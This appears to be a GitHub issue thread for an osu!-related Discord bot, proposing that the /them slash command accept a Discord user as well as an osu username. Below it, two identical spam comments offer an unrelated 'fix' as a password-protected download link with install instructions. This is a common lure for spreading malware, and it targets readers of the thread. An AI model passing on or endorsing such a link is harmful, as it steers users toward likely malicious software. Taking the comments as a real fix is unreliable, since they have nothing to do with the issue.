### ISSUE TITLE
/them via discord user

### ISSUE THREAD

**Issue by jack3898** [jack3898/osu-crew-bot#10]
BLOCKED BY #9

/them needs to be expanded

This time there will be the option to select the user by their discord profile using the slash commands experience

Command anatomy:

/them [osu username]? | [Discord user]?

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
